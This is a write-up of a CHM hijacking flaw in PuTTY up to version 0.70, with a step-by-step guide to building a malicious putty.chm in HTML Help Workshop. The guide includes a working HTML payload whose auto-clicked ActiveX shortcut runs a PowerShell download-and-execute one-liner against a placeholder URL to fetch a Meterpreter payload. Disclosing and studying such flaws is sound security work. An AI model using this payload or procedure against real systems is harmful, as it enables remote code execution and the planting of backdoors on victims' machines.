Code Execution in PuTTY via CHM Hijacking

Code Execution in PuTTY via CHM Hijacking

Introduction

Up to and including version 0.70, when you launched the online help in any of the Windows PuTTY GUI tools, the tool would locate its help file by looking alongside its own executable.

If you were running PuTTY from a directory that unrelated code could arrange to drop files into (for example, running it directly from a browser's default download directory), this means that if somebody contrived to get a file called putty.chm into that directory (for example, by enticing you to click on a download link with that name) then PuTTY would believe it was the real help file, and feed it to htmlhelp.exe.

This is a vulnerability because HTML Help files (.chm) can arrange in turn to run code of their choice, for example by embedding an HTML element that is a Windows shortcut, plus Javascript to click it.

More details: chiark.greenend.org.uk/~sgtatham/putty/wish..

What is CHM file?

CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft’s HTML-based help program. It may contain many compressed HTML documents and the images and JavaScript they link to. CHM features include a table of contents, index, and full text searching.

This used before?

In the past, threat actors used a CHM files to drop the backdoor file, which is commonly used in targeted attacks.

Some examples:

Procedure for generating Malicious CHM file

GitHub Repository: github.com/yasinyilmaz/vuln-chm-hijack

We need to HTML Help Workshop toolkit for create a CHM file. After installation, then launch HTML Help Workshop tool.

Steps

1 - Click on File > New > Project and follow above steps:

Creating HTML Help Project

  • New Project Screen > Next > Browse

  • Specify the name of your project file, and where you wild like it to be created.

  • Fill File name: putty and click on "Open"

Specify your HTML Help Project

2 - If you have already created HTML file that you select to include in your project.

  • Select HTML files (.htm)

  • Speciy where your .htm files are located.

  • "Add.." button and select an already created directory for exploit to hold your malicious file like as putty.htm

Select a HTM file

3 - Wizard create a new HTML Help Project. We need to make changes.

4 - In the tool, double click on the created htm to edit it, then insert the code below to create a basic Help file:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>

5 - Now, we create a button object which starts malicious exe when it’s clicked. In addition to the object, we also add a script part which will click the button automatically when the document is opened:

<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{YOUR MALICIOUS FILE URL}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Welcome! </h3></p>
</body>
</html>

Create malicious file

6 - The PowerShell command will connect to the listed remote URL and execute the meterpreter that the site responds with. This remote script can be other PowerShell(.ps) script or Meterpreter Payload for Windows.

When you double click on the Help button a putty.exe spawns as a child of malware.exe which is the interpretor of the CHM binary file. (Your malicious putty.chm and putty.exe file should be hold same directory)

Spawns a malware

References: